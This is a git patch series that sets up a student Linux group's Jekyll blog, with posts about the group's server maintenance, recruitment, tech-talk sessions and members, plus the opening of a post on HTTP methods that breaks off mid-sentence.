From 6f7460bda88682892fb354782e4e18311c78594a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:02:49 +0800 Subject: [PATCH 01/22] cname --- CNAME | 1 + 1 file changed, 1 insertion(+) create mode 100644 CNAME diff --git a/CNAME b/CNAME new file mode 100644 index 000000000..3e74b9a1b --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +blog.sdutlinux.org \ No newline at end of file From 0c093b0efcf84e516bfb42486d575ee2e5e66ca7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:09:56 +0800 Subject: [PATCH 02/22] update --- _config.yml | 12 +--- _posts/2012-06-01-work-enviroment.markdown | 13 ++++ _posts/2012-06-16-ri-chang-gong-zuo.markdown | 63 +++++++++++++++++++ _posts/2012-06-19-shu-jia-zhao-ren.markdown | 21 +++++++ _posts/2012-06-28-wen-dang-ji-hua.markdown | 38 +++++++++++ .../2013-04-23-chat-with-new-people.markdown | 29 +++++++++ _posts/2013-05-06-more-post.md | 31 --------- ...-slash-05-slash-18ji-zhu-jiao-liu.markdown | 26 ++++++++ _posts/2014-03-15-exchange.markdown | 39 ++++++++++++ _posts/2014-05-31-exchange.markdown | 40 ++++++++++++ 10 files changed, 272 insertions(+), 40 deletions(-) create mode 100644 _posts/2012-06-01-work-enviroment.markdown create mode 100644 _posts/2012-06-16-ri-chang-gong-zuo.markdown create mode 100644 _posts/2012-06-19-shu-jia-zhao-ren.markdown create mode 100644 _posts/2012-06-28-wen-dang-ji-hua.markdown create mode 100644 _posts/2013-04-23-chat-with-new-people.markdown delete mode 100644 _posts/2013-05-06-more-post.md create mode 100644 _posts/2013-05-19-2013-slash-05-slash-18ji-zhu-jiao-liu.markdown create mode 100644 _posts/2014-03-15-exchange.markdown create mode 100644 _posts/2014-05-31-exchange.markdown diff --git a/_config.yml b/_config.yml index 9ca063581..49c92f72f 100644 --- a/_config.yml +++ b/_config.yml @@ -1,5 +1,5 @@ -title: Scribble -description: A jekyll theme. Because I scribble. +title: sdutlinux +description: cool url: # Site url. signoff: # Your name. disqus_shortname: # disqus comment thread for post header options. ( leave blank if unwanted. ) @@ -9,14 +9,8 @@ google_analytics: # set tracking, remove from /javascripts/basic.js if unwanted. links: - name: About url: /about - - name: Blog - url: http://muan.co - external: true - - name: Email - url: mailto:hello@muan.co - external: true - name: GitHub - url: http://github.com/muan + url: http://github.com/sdutlinux external: true highlighter: pygments permalink: pretty diff --git a/_posts/2012-06-01-work-enviroment.markdown b/_posts/2012-06-01-work-enviroment.markdown new file mode 100644 index 000000000..e202be295 --- /dev/null +++ b/_posts/2012-06-01-work-enviroment.markdown @@ -0,0 +1,13 @@ +--- +layout: post +title: "小组工作环境" +date: 2012-06-01 00:40 +disqus: y +--- +地址: 鸿远楼611 +![group1](http://pic.yupoo.com/lidashuang/C2p1qhEB/medish.jpg) +![group2](http://pic.yupoo.com/lidashuang/C2p1knCL/medish.jpg) +![group2](http://pic.yupoo.com/lidashuang/C2p1j4eH/medish.jpg) +![group2](http://pic.yupoo.com/lidashuang/C2p1czPd/medish.jpg) +![group2](http://pic.yupoo.com/lidashuang/C2p1n88O/medish.jpg) +![group2](http://pic.yupoo.com/lidashuang/C2x6JID0/medish.jpg) diff --git a/_posts/2012-06-16-ri-chang-gong-zuo.markdown b/_posts/2012-06-16-ri-chang-gong-zuo.markdown new file mode 100644 index 000000000..9b2235141 --- /dev/null +++ b/_posts/2012-06-16-ri-chang-gong-zuo.markdown @@ -0,0 +1,63 @@ +--- +layout: post +title: "日常工作" +date: 2012-06-16 12:50 +disqus: y +--- + +先说下我们小组吧,我们小组现在有四个人,大一大四的都有,有一个带我们的老师。 +服务器主要有两部分,第一部分是教学楼的监控,录播服务器等。第二部分在鸿远楼机房,是运行各种web网站。 +## 三号楼情况 +负责三号楼录播服务器的维护。操作系统是win 2003, 要做的是定期备份。每年暑假会对 +三四五号楼的服务器,教室计算机统一的维护。 + +![3h](http://pic.yupoo.com/lidashuang/C2PSwxsR/medish.jpg) +![3h](http://pic.yupoo.com/lidashuang/C2PSwHlf/medish.jpg) + +## 鸿远楼 + +简单说下第二部分吧。 + +有8台服务器和一台dell的磁盘柜,Dell的服务器居多,型号有R710和R510,其它的有浪潮,惠普的。 + +运行的服务主要是web服务器(nginx,apache,IIS),数据库(mysql,oracle,sqlserver)等。网站比较杂。 + +操作系统有Red Hat,ubuntu server和windows 2003,所有的服务器都放在内网,使用端口转发或者反向代理访问。 + +比如我们网络教学平台,一台Dell R510运行的是网络教学综合平台 web 服务器(apache + tomcat) , +数据库是oracle,运行在另一台服务器(Dell R710) ,这两台操作系统都是Red Hat(5.5和4.7)。 +现在我们一般都用ubuntu server 。 因为网站比较杂,我们还会使用vmware server等,这样的 +话新节省资源,备份也比较方便,试过xen server,还在感觉vmware server 方便一些。 + +在维护服务器 + +![server](http://pic.yupoo.com/lidashuang/C2PSwn1L/medish.jpg) +![server](http://pic.yupoo.com/lidashuang/C2PSw9tG/medish.jpg) + +关于日常工作 +先说说遇到过的主要问题吧 + +硬件问题,磁盘坏道,主板曝浆,内存等。 +安全方面,服务器被入侵 + +最怕的是磁盘出问题,遇到过一次运行 oracle +的服务器磁盘坏道。当时是我和另外一名成员处理的,处理过程是这样的: +首先我们先尝试着导出数据,然后在一台测试机器上做测试导出的数据是否有效。如果数据已经损坏的话,只能用以前的备份。 +还好导出的数据是有效的,因为我们之前没有oracle的经验,都是现学现做,做的时候比较小心,大约花了一个星期处理好。 + +现在我们服务器磁盘都做了Raid5, +数据比较安全。重要数据都会有自动备份。没有出现过数据丢失的状况。 + +安全方面,服务器都放在内网,有一台软路由做的防火墙,是用openwrt做的。自己写的iptables 规则, +对外只开放80端口。访问内网用端口转发,也会用nginx做反向代理 。没用防火墙之前,出现过一台 +win2003被黑的情况。之后使用国产的海蜘蛛。由于海蜘蛛的各种限制, 这学期换成了openwrt . + +做好备份,安全,工作量很小,平常其它时间都搞一些自己喜欢的技术。组织一交流活动. + +鸿远楼有乒乓球室,可以轻松下。 +![ping](http://pic.yupoo.com/lidashuang/C2PSwvWe/medish.jpg) + +会组织一些技术交流 +![part](http://pic.yupoo.com/lidashuang/BpvVnCXC/medish.jpg) +![part](http://pic.yupoo.com/lidashuang/BpvVpJBb/medish.jpg) +![part](http://pic.yupoo.com/lidashuang/BpvVrbgG/medish.jpg) diff --git a/_posts/2012-06-19-shu-jia-zhao-ren.markdown b/_posts/2012-06-19-shu-jia-zhao-ren.markdown new file mode 100644 index 000000000..f9d8616fa --- /dev/null +++ b/_posts/2012-06-19-shu-jia-zhao-ren.markdown @@ -0,0 +1,21 @@ +--- +layout: post +title: "暑假招人" +date: 2012-06-19 11:19 +disqus: y +--- +现在我们需要两名志同道合的成员加入,与我们学习,工作,一起成长。 +**暑假留校,会有工资。** + +如果你 + +* 喜欢计算机,如果你用过linux,搭过服务器,大加分。 +* 忠实的linuxer, 觉得vim 是个好编辑器,大加分。 +* 如果你喜欢研究技术, 有分享技术的精神,大加分。 +* 你有一定的写作能力,并有自己的博客,大加分。 +* 不满足于老师教授的内容,喜欢自学,拥有很强的自学能力,大加分。 +* 有美工经验,熟悉ps,大加分。 +* 玩游戏,但不沉迷,大加分。 + + +有想法的直接发短信 15269395839 或email: ldshuang@gmail.com diff --git a/_posts/2012-06-28-wen-dang-ji-hua.markdown b/_posts/2012-06-28-wen-dang-ji-hua.markdown new file mode 100644 index 000000000..5edb41b92 --- /dev/null +++ b/_posts/2012-06-28-wen-dang-ji-hua.markdown @@ -0,0 +1,38 @@ +--- +layout: post +title: "文档计划" +date: 2012-06-28 15:49 +disqus: y +--- + +## 目的 + +从上学起,老师就说好记性,不如烂笔头。确实,在教育技术中心,我们的工作可以不多, +但有时没有正解,完善的文档的话,我们的工作量可以会翻倍。 + +为了节省新同学的学习成本,为了遇到问题时能更方便,快速的解决。需要完善下我们的文档。 + +希望老同学,能在业余时间贡献一点,您的一句话,可以会让新手节省一天的时间。 + +[文档地址 http://jwch.sdut.edu.cn/book](http://jwch.sdut.edu.cn/book) + + +##用到的工具 + +本文档使用 reStructuredText 编写 , 语法请参见 [reStructuredText 简明教程](http://jwch.sdut.edu.cn/book/rst.html#rst-tutorial) + +以及 + + [Sphinx Project How-To](http://code.google.com/p/pymotwcn/wiki/SphinxprojectHowto) + + [基于结构化文本 reStructuredText 的图书工程](http://taoc-zh.readthedocs.org/en/latest/README.html) + + [Quick reStructuredText](http://docutils.sourceforge.net/docs/user/rst/quickref.html) + +## 如何提交自己的修改? + +我在github.com建立jwch 的组织,你在这个组织的话,就有权限。没有的话,请将你的github 帐号告诉我 + +需要你会使用git && github + +[项目地址](https://github.com/jwch/book) diff --git a/_posts/2013-04-23-chat-with-new-people.markdown b/_posts/2013-04-23-chat-with-new-people.markdown new file mode 100644 index 000000000..52315cbcd --- /dev/null +++ b/_posts/2013-04-23-chat-with-new-people.markdown @@ -0,0 +1,29 @@ +--- +layout: post +title: 2013/04/21 技术交流 +date: 2013-04-23 02:34 +disqus: y +--- + +周末教育技术中心技术交流,主要面向新人. + +相关内容查看这个页面 http://jwch.sdut.edu.cn/book/start/index.html + +主要主题 + +* linux 基础入门 +* vim 入门 + + +![](http://ww2.sinaimg.cn/large/708339f3tw1e3ygwolhumj218g0xcqb8.jpg) + +![](http://ww2.sinaimg.cn/large/708339f3tw1e3ygwnxm7cj218g0xcqd8.jpg) + +![](http://ww3.sinaimg.cn/large/708339f3tw1e3ygwn46qdj218g0xcalo.jpg) + +![](http://ww4.sinaimg.cn/large/708339f3tw1e3ygwiv6qwj218g0xcqep.jpg) + +![](http://ww4.sinaimg.cn/large/708339f3tw1e3ygwjvhygj218g0xc7ey.jpg) + +![](http://ww1.sinaimg.cn/large/708339f3tw1e3ygwkiteij218g0xcah4.jpg) + diff --git a/_posts/2013-05-06-more-post.md b/_posts/2013-05-06-more-post.md deleted file mode 100644 index b0812ef76..000000000 --- a/_posts/2013-05-06-more-post.md +++ /dev/null @@ -1,31 +0,0 @@ ---- -layout: post -title: Placeholder post -date: 2013-05-06 15:27:31 ---- - -I am a placeholder post. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. - -> Boom. I am a blockquote. -> -> Say something really clever here. - -1. List with code - - ``` - not highlighted - multi line - ``` -2. List with code{% highlight javascript %} -var dom = document.getElementById('boom') -console.log(dom);{% endhighlight %} - -Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec quam felis, ultricies nec, pellentesque eu, pretium quis, sem. Nulla consequat massa quis enim. - -Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. - -{% highlight ruby %} -def whaaa - puts "I have a friend called Bobobmob." -end -{% endhighlight %} \ No newline at end of file diff --git a/_posts/2013-05-19-2013-slash-05-slash-18ji-zhu-jiao-liu.markdown b/_posts/2013-05-19-2013-slash-05-slash-18ji-zhu-jiao-liu.markdown new file mode 100644 index 000000000..7b031a273 --- /dev/null +++ b/_posts/2013-05-19-2013-slash-05-slash-18ji-zhu-jiao-liu.markdown @@ -0,0 +1,26 @@ +--- +layout: post +title: "2013/05/18技术交流" +date: 2013-05-19 11:38 +disqus: y +--- + +这一周还是主要面向新人. + +## 主题: + ++ django入门之hello world 和`MTV`文件结构. ++ python基础之package使用和`__init__.py`文件的一般作用 ++ python 魔法(元编程) + +## 主题详情: + +### django基础 + + - [安装方法](https://docs.djangoproject.com/en/1.5/intro/install/) + - [django快速入门教程](https://docs.djangoproject.com/en/1.5/intro/overview/) + + +### python 魔法(元编程) + + 源自[刘哲](http://liuzhe0223.github.io)在[论坛上](http://sdutlinux.org/t/685)的分享, 主要分享了python中跟随类的实例化产生的一系列内置方法,指的是以`__`开头以`__`结尾的方法.[这里](http://conanchou.github.io/blog/Python/Programming/2012/08/21/python-metaprogramming-with-magic-methods/)有一个例子,讲解的就是其中的`__getattr__()`方法. + + 详细文档[A Guide to Python's Magic Methods](http://www.rafekettler.com/magicmethods.html) diff --git a/_posts/2014-03-15-exchange.markdown b/_posts/2014-03-15-exchange.markdown new file mode 100644 index 000000000..b77450af7 --- /dev/null +++ b/_posts/2014-03-15-exchange.markdown @@ -0,0 +1,39 @@ +--- +layout: post +title: "2014/03/15技术交流" +date: 2014-03-16 08:46 +disqus: y +--- + +## 交流内容 + ++ 俄广宁 + + - 平衡四轴中的各种矩阵运算,信号处理,还有很亮的飞行器! + +![](http://zhwei.qiniudn.com/sdutlinux-IMG_20140315_194043.jpg) + ++ 张卫 + + - django快速开发 + - django generic view 进阶 + ++ 张腾 + + - Session and Cookie + - 多站点共用Session + - php Session handler的重写 + +![](http://zhwei.qiniudn.com/sdutlinux-IMG_20140315_211014.jpg) + ++ 汤奇峰 + + - Tengine 小探 + - 二叉树 + - Clojure 函数式语言特性 +![](http://zhwei.qiniudn.com/sdutlinux-IMG_20140315_211204.jpg) + +![](http://zhwei.qiniudn.com/sdutlinux-IMG_20140315_211157.jpg) + + +![飞行器](http://zhwei.qiniudn.com/sdutlinux-IMG_20140315_214122.jpg) diff --git a/_posts/2014-05-31-exchange.markdown b/_posts/2014-05-31-exchange.markdown new file mode 100644 index 000000000..0e046a5ca --- /dev/null +++ b/_posts/2014-05-31-exchange.markdown @@ -0,0 +1,40 @@ +--- +layout: post +title: "2014/05/31技术交流" +date: 2014-06-04 16:38 +disqus: y +--- + +## 交流内容 + ++ 俄广宁 + + - 物联网 + + tag: zigbee + +![1](http://zhwei-blog.qiniudn.com/group-IMG_20140531_194859.jpg) +![2](http://zhwei-blog.qiniudn.com/group-IMG_20140531_194912.jpg) +![3](http://zhwei-blog.qiniudn.com/group-IMG_20140531_194920.jpg) + ++ 张腾 + + - sqlmap + + Automatic SQL injection and database takeover tool + - XSS 注入介绍 + ++ 张卫 + + - 电面经验 + ++ 崔哲 + + + ACMer的生活 + +![4](http://zhwei-blog.qiniudn.com/group-IMG_20140531_204343.jpg) +![5](http://zhwei-blog.qiniudn.com/group-IMG_20140531_204359.jpg) +![6](http://zhwei-blog.qiniudn.com/group-IMG_20140531_204403.jpg) +![7](http://zhwei-blog.qiniudn.com/group-IMG_20140531_204604.jpg) +![8](http://zhwei-blog.qiniudn.com/group-IMG_20140531_204644.jpg) + + +Ps: 妹子最多的一次 From d36b01cecd940e142f5b64929ba6ad1d6b47fded Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:17:07 +0800 Subject: [PATCH 03/22] update --- _config.yml | 3 +++ about.md | 34 +++++++++++++++++++++--- members.md | 76 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 110 insertions(+), 3 deletions(-) create mode 100644 members.md diff --git a/_config.yml b/_config.yml index 49c92f72f..323b18364 100644 --- a/_config.yml +++ b/_config.yml @@ -9,6 +9,9 @@ google_analytics: # set tracking, remove from /javascripts/basic.js if unwanted. links: - name: About url: /about + - name: Members + url: /members + external: true - name: GitHub url: http://github.com/sdutlinux external: true diff --git a/about.md b/about.md index b7fe27f4e..d162bbb95 100644 --- a/about.md +++ b/about.md @@ -3,8 +3,36 @@ layout: page title: About --- -Give people something to read and get to know you. Here's my attempt: this is [Mu-An](http://muan.co), a designer developer who lives in London at the moment. +## 我们是谁? -Tweet at [@muanchiou](http://twitter.com/muanchiou), read my code on [GitHub](http://github.com/muan), see my designs on [Dribbble](http://dribbble.com/muan), find my CV on [LinkedIn](http://uk.linkedin.com/in/muanchiou). +山东理工大学.现代教育技术中心的由学生组成的技术小组.主要工作是开发高校教学相关程 +序、学校相关网络课程平台以及参与管理/维护教务处部分服务器、程序全校公共教学楼网 +络系统、监控/声控系统 -This theme is made by me. You have a nice day. ♥ \ No newline at end of file +* 我们倾向于组建小而精悍的团队 +* 我们相信技术和团队协作的力量 +* 我们喜欢快速反应的工作和学习节奏 +* 我们乐于相互分享技术/学习/工作/生活 + +## 欢迎加入我们 + +*要求* + +* 学习与积累为主,薪资不是放在第一位的:我们要找的是志同道合的同学,如果你要找个高收入的校外兼职工作,可以不必浪费时间了。 +* 没有“混饭吃”的可能:聊天、总是看无厘头电影/偶像剧、沉溺于网络游戏、无所事事……总之,不能投入学习和工作,而是浪费自己的生命和打发时间的,请不要加入 +* 有务实精神:如果你很善于做“面子活儿”,或者擅长务虚而不喜欢扎扎实实做事,请不要联系我们 + +## 加入我们的理由 + +* 做自己喜欢做的事:我们支持成员学习自己想学的技术,发展自己喜欢的兴趣,用自己喜欢的技术实现小组需要的功能,目前我们成员中有超喜欢用python编程的,也有喜欢养花的 +* 小组很在乎你的工作和学习 +* 一次团队合作的机会 +* 没有”office politics”:在小组没有等级森严的行政级别,我们摈弃所谓的“办公室政治”,希望营造一个开放、透明、自由的工作和学习环境 +* 健康工作和学习:长时间的伏案学习/工作,容易引起身体不适,小组支持成员锻炼身体,也设置有相关健身器械。而且我们还有定期的户外活动,这也是我们学习/工作/生活的一部分 +* 和绿色一起工作学习:我们觉得在工作台养些植物/花儿/草儿,是一种低碳和又可以减少计算机辐射的绿色方式 +* 没有固定的值班/工作的时间:任意你什么时间到工作室学习或工作,常常有家伙在着熬夜编程或学习,也有家伙在早上楼下有老太老头们练太极时就来工作室了,有家伙偶尔晚上会来一趟,也有家伙一个月才露面那么一两次 +* 定期内部技术分享活动 +* 正式加入的成员将有,学校兼职技术岗位的薪资待遇 +* 开放、自由、良好的工作空间环境 +* 实际项目开发:将有实际项目开发的机会,这本来就是一个锻炼、学习、成长的平台 +* 因为看了上面的几条理由:其实,选择有时候也很简单,是否能把我机会让自己快乐的成长和学习,选择在于自己 diff --git a/members.md b/members.md new file mode 100644 index 000000000..e37685de9 --- /dev/null +++ b/members.md @@ -0,0 +1,76 @@ +--- +layout: page +title: Members +--- + +## 林寻 + +![linxun](http://pic.yupoo.com/lidashuang/C0rN1fbE/ySXk3.jpg) + +* 计算机学院07级 + + 关注web开发相关,关注LAMP, 现在在上海工作。 + +* 博客: [http://www.linxun.info](http://www.linxun.info) + +## 孙建希 + +![jianxi](http://pic.yupoo.com/ycsunjane/BUEXkBsM/medium.jpg) + +* 计算机学院08级 + +关注嵌入式linux,arm开发。 + +* 博客: [http://jianxi.info](http://jianxi.info) + + +## 李大双 + +![lidashuang](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e5uc1ffmduj21kw0w0jti.jpg) + +* 计算机学院09级 + +Go程序员,Gnu/linux 坚定支持者,使用Arch,ubuntu 等。喜欢Ruby, Rails,Golang。 + +* 博客:[http://li.sdutlinux.org/](http://li.sdutlinux.org/) + + +##刘哲 + +![liuzhe](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57soe2ztvj21kw0w044p.jpg) + +* 计算机学院10级 + +喜欢linux, python +1 ,RoRing + +* 博客: [http://liuzhe0223.github.com](http://liuzhe0223.github.com) + +##马伟伟 + +![ma](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57si85200j21kw0w0ahc.jpg) + +* 计算机学院10级 + +喜欢linux, python, + +* 博客: [http://ma6174.cnblogs.com](http://ma6174.cnblogs.com) + + +##张卫 + +![zhwei](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57sorc06wj21kw0w0n43.jpg) + +* 计算机学院11级 + +pythoner,热爱生活. + +* 博客: [http://zhangweide.cn](http://zhangweide.cn) + +## 汤奇峰 + +![tang](http://ww2.sinaimg.cn/bmiddle/7121be43jw1e7dyk51v4tj21kw16o12o.jpg) + +* 计算机学院11级 + + +* 博客: [http://xpaomian.com](http://xpaomian.com) From bf6d9d9d23489a9157180352251edaa690e7d4fe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:18:46 +0800 Subject: [PATCH 04/22] Fixed gfw --- _includes/head.html | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/_includes/head.html b/_includes/head.html index 8140edc51..62a18cbc0 100644 --- a/_includes/head.html +++ b/_includes/head.html @@ -1,5 +1,5 @@ - + @@ -7,7 +7,6 @@ - From 62ed0e944b42cdde9471451e2657ebc2da1c1cfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:19:48 +0800 Subject: [PATCH 05/22] Fixed --- _config.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_config.yml b/_config.yml index 323b18364..65d0faa5a 100644 --- a/_config.yml +++ b/_config.yml @@ -11,7 +11,7 @@ links: url: /about - name: Members url: /members - external: true + external: false - name: GitHub url: http://github.com/sdutlinux external: true From 4889bf30ecfb26b500095704d2b54372693b022b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Sat, 25 Oct 2014 18:23:04 +0800 Subject: [PATCH 06/22] del --- _posts/2012-06-28-wen-dang-ji-hua.markdown | 38 ----------- .../2013-05-06-scribble-the-jekyll-theme.md | 64 ------------------- 2 files changed, 102 deletions(-) delete mode 100644 _posts/2012-06-28-wen-dang-ji-hua.markdown delete mode 100644 _posts/2013-05-06-scribble-the-jekyll-theme.md diff --git a/_posts/2012-06-28-wen-dang-ji-hua.markdown b/_posts/2012-06-28-wen-dang-ji-hua.markdown deleted file mode 100644 index 5edb41b92..000000000 --- a/_posts/2012-06-28-wen-dang-ji-hua.markdown +++ /dev/null @@ -1,38 +0,0 @@ ---- -layout: post -title: "文档计划" -date: 2012-06-28 15:49 -disqus: y ---- - -## 目的 - -从上学起,老师就说好记性,不如烂笔头。确实,在教育技术中心,我们的工作可以不多, -但有时没有正解,完善的文档的话,我们的工作量可以会翻倍。 - -为了节省新同学的学习成本,为了遇到问题时能更方便,快速的解决。需要完善下我们的文档。 - -希望老同学,能在业余时间贡献一点,您的一句话,可以会让新手节省一天的时间。 - -[文档地址 http://jwch.sdut.edu.cn/book](http://jwch.sdut.edu.cn/book) - - -##用到的工具 - -本文档使用 reStructuredText 编写 , 语法请参见 [reStructuredText 简明教程](http://jwch.sdut.edu.cn/book/rst.html#rst-tutorial) - -以及 - - [Sphinx Project How-To](http://code.google.com/p/pymotwcn/wiki/SphinxprojectHowto) - - [基于结构化文本 reStructuredText 的图书工程](http://taoc-zh.readthedocs.org/en/latest/README.html) - - [Quick reStructuredText](http://docutils.sourceforge.net/docs/user/rst/quickref.html) - -## 如何提交自己的修改? - -我在github.com建立jwch 的组织,你在这个组织的话,就有权限。没有的话,请将你的github 帐号告诉我 - -需要你会使用git && github - -[项目地址](https://github.com/jwch/book) diff --git a/_posts/2013-05-06-scribble-the-jekyll-theme.md b/_posts/2013-05-06-scribble-the-jekyll-theme.md deleted file mode 100644 index bf41c8ebd..000000000 --- a/_posts/2013-05-06-scribble-the-jekyll-theme.md +++ /dev/null @@ -1,64 +0,0 @@ ---- -layout: post -title: Scribble, a Jekyll theme -date: 2013-05-06 16:27:31 -disqus: y ---- - -I have other themes, checkout (mainly) [this repository](https://github.com/muan/muan.github.com/releases) and [this repository](https://github.com/muan/jekyll-wardrobe). <3 - ---- - -There is no clever design philosophy to talk about, I tried to find something to work with, and 'scribble' came to my mind. This theme uses Open Sans powered by Google Web Fonts, and was written in plain HTML, SCSS & CoffeeScript, though .scss & .coffee files wouldn't be included in the theme. - -The theme is mobile optimised but I did not check browser compatibility. It looks great in Chrome, Safari and Firefox though. - -Get it on GitHub ♥ - ---- - -### Get started - -1. [Fork the repository](https://github.com/muan/scribble/fork). -2. Clone the repository to your computer.
`git clone https://github.com/username/scribble` -3. `bundle install` -4. **If using older versions of Jekyll**
- Build and run jekyll using `jekyll --server --auto`.
- **If using [Jekyll 1.0](http://blog.parkermoore.de/2013/05/06/jekyll-1-dot-0-released/)**
- Build Jekyll using `jekyll build`.
- Then run Jekyll using `jekyll serve --watch`
-5. Go to http://localhost:4000 for your site. - ---- - -### Make it yours - -1. I have extract most user specific information to `_config.yml`, you should be able to set up almost everything from it. -2. Change about.md for blog intro. -3. For domain settings, see [the guide from GitHub](https://help.github.com/articles/setting-up-a-custom-domain-with-pages). - ---- - -### Options - -When writing a post, there are 3 options you can add to the header. - -1. **disqus: y**
- If disqus is set to 'y', at the end of the post there will be a disqus thread, just like this one. To use disqus, you MUST [set up your own disqus account](http://disqus.com/). - -2. **share: y**
- An option for showing tweet and like button under a post. - -3. **date**: 2013-05-06 18:07:17
- Date is not a required header since Jekyll reads the file name for date, this was added in only for the **signoff time**. (as shown at the end of this post) If you don't want the signoff time, go into `/includes/signoff.html` and remove the ``. - ---- - -Get it on GitHub ♥ - ---- - -### The end - -Like it? [Tell me](http://twitter.com/muanchiou).
-Problem? [Use GitHub Issues](https://github.com/muan/scribble). \ No newline at end of file From ca39b1bf8139a363cf037500d98cdee02fe1b05f Mon Sep 17 00:00:00 2001 From: Magine Date: Sun, 26 Oct 2014 11:53:34 +0800 Subject: [PATCH 07/22] =?UTF-8?q?=E6=B2=A1=E6=9C=89=E5=8D=9A=E5=AE=A2?= =?UTF-8?q?=E6=B2=A1=E6=9C=89=E5=8D=9A=E5=AE=A2=E6=B2=A1=E6=9C=89=E5=8D=9A?= =?UTF-8?q?=E5=AE=A2?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- members.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/members.md b/members.md index e37685de9..456ef1b0c 100644 --- a/members.md +++ b/members.md @@ -74,3 +74,12 @@ pythoner,热爱生活. * 博客: [http://xpaomian.com](http://xpaomian.com) + +## 李敏成 + +![magine](http://magine.qiniudn.com/psu.jpg) + +* 计算机学院12级 + + +* 博客: [自闭症患者,没有博客。]() From 6fe2342003e3342e68e68a3965ada3cda467038e Mon Sep 17 00:00:00 2001 From: ZHANG RT <4399.omi@gmail.com> Date: Mon, 27 Oct 2014 15:52:20 +0800 Subject: [PATCH 08/22] add me --- members.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/members.md b/members.md index 456ef1b0c..04bd2b653 100644 --- a/members.md +++ b/members.md @@ -83,3 +83,13 @@ pythoner,热爱生活. * 博客: [自闭症患者,没有博客。]() + +## 张睿提 + +![zrt](http://sdut-zrt.qiniudn.com/IMG_2024.jpg) + +* 计算机学院13级 + + +* 博客: [http://imomi.info](http://imomi.info) + From 5a07eaea11d679a98e1a8a60ac3db6fb2a46256a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=A5=C3=A5?= Date: Mon, 27 Oct 2014 17:40:09 +0800 Subject: [PATCH 09/22] Update members.md --- members.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/members.md b/members.md index 04bd2b653..e14057dfc 100644 --- a/members.md +++ b/members.md @@ -30,7 +30,7 @@ title: Members * 计算机学院09级 -Go程序员,Gnu/linux 坚定支持者,使用Arch,ubuntu 等。喜欢Ruby, Rails,Golang。 +程序员, 专业打杂, 熟悉xxx语言`HelloWorld` * 博客:[http://li.sdutlinux.org/](http://li.sdutlinux.org/) From f6b705580bab2c579bbd799ad159e8d2c56fe4c9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=A5=C3=A5?= Date: Mon, 27 Oct 2014 17:41:54 +0800 Subject: [PATCH 10/22] Update members.md --- members.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/members.md b/members.md index e14057dfc..fcacff256 100644 --- a/members.md +++ b/members.md @@ -53,7 +53,7 @@ title: Members 喜欢linux, python, -* 博客: [http://ma6174.cnblogs.com](http://ma6174.cnblogs.com) +* 博客: [https://github.com/ma6174/blog/issues](https://github.com/ma6174/blog/issues?q=is:open+is:issue) ##张卫 From 04c36f0d30482d339b657a6829045c01d42cfb60 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=8D=AB?= Date: Mon, 27 Oct 2014 22:50:46 +0800 Subject: [PATCH 11/22] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E5=8D=9A=E5=AE=A2?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...2014-06-16-http-method-annotation.markdown | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 _posts/2014-06-16-http-method-annotation.markdown diff --git a/_posts/2014-06-16-http-method-annotation.markdown b/_posts/2014-06-16-http-method-annotation.markdown new file mode 100644 index 000000000..b0d8df91b --- /dev/null +++ b/_posts/2014-06-16-http-method-annotation.markdown @@ -0,0 +1,76 @@ +--- +layout: post +title: "HTTP请求方式注解" +date: 2014-06-16 13:19 +comments: true +tags: Notes +--- + +被问到了HTTP常见的几个方法,也有些迷惑的地方,整理如下。 + +# GET + +GET是http的默认请求方式, 一般用来获取数据, 传输的数据经过url编码后放在路径`?`之后, 多个键值对通过`&`连接, 另外get的传输长度一般不推荐超过255个字节。 + + +GET方法一般被视为安全方法, 因为它仅用来获取数据而不会对服务器有其他改动。 + +> **安全方法** +> 像HEAD、GET、OPTIONS 和 TRACE这几种http方法是被认为是“安全的”, 这意味着它们只会进行获取数据而不会修改服务器的状态, 换句话说,它们不会产生负面影响, 当然除了常见的无害操作,比如记录日志、创建缓存或者创建其他统计信息。 +> 正相反, 像POST、PUT、DELETE 和 PATCH 